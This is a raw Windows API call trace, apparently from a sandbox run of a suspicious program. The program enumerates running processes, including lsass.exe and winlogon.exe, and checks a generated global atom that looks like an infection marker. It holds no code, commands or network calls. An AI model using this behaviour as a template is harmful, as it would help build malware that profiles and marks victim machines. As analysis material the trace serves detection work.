	[0096.528] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0096.528] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.528] CloseHandle (hObject=0x248) returned 1
	[0096.528] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x658970, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0096.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0096.529] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.529] CloseHandle (hObject=0x248) returned 1
	[0096.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0096.529] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.529] CloseHandle (hObject=0x248) returned 1
	[0096.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x64fd10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.529] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0096.529] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.529] CloseHandle (hObject=0x248) returned 1
	[0096.529] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x658f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0096.530] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.530] CloseHandle (hObject=0x248) returned 1
	[0096.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0096.530] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.530] CloseHandle (hObject=0x248) returned 1
	[0096.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x658d88, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.530] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0096.530] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.530] CloseHandle (hObject=0x248) returned 1
	[0096.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x658cb8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0096.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0096.531] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.531] CloseHandle (hObject=0x248) returned 1
	[0096.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x658c68, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0096.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.531] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.531] CloseHandle (hObject=0x248) returned 1
	[0096.531] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.531] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.532] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.533] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0096.533] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.533] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.534] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetLastError () returned 0x5
	[0096.535] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.535] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0096.536] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0096.536] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0096.536] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0096.536] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0096.536] CloseHandle (hObject=0x248) returned 1
	[0096.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0096.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0096.536] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x64fd10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.536] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0096.537] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.537] CloseHandle (hObject=0x248) returned 1
	[0096.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x65ada8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.537] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0096.537] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.537] CloseHandle (hObject=0x248) returned 1
	[0096.537] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x64fe78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0096.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16638) returned 0xc0000004
	[0096.601] VirtualAlloc (lpAddress=0x0, dwSize=0x16738, flAllocationType=0x3000, flProtect=0x4) returned 0x610000
	[0096.601] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x610000, Length=0x16738, ResultLength=0x0 | out: SystemInformation=0x610000, ResultLength=0x0) returned 0x0
	[0096.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0096.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x64fd10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0096.602] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0096.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fe90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0096.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0096.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x64fd10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0096.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.603] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0096.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x64fe78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0096.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x64fe78, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0096.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0096.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0096.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.604] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0096.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x65adf8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0096.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0096.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0096.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0096.605] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.605] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0096.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0096.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0096.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fd28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0096.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fea8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.606] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0096.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0096.607] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.607] CloseHandle (hObject=0x248) returned 1
	[0096.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x64fe78, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0096.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0096.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.607] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0096.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x658f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0096.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0096.608] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.608] CloseHandle (hObject=0x248) returned 1
	[0096.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x658dc8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0096.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0096.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x64fe90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0096.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0096.608] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.608] CloseHandle (hObject=0x248) returned 1
	[0096.608] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x64fd10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.608] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0096.609] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.609] CloseHandle (hObject=0x248) returned 1
	[0096.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0096.609] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.609] CloseHandle (hObject=0x248) returned 1
	[0096.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x64fe78, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0096.609] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0096.609] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.609] CloseHandle (hObject=0x248) returned 1
	[0096.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x6590c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0096.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0096.610] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0096.610] CloseHandle (hObject=0x248) returned 1
	[0096.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x64fd10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0096.610] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0096.610] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
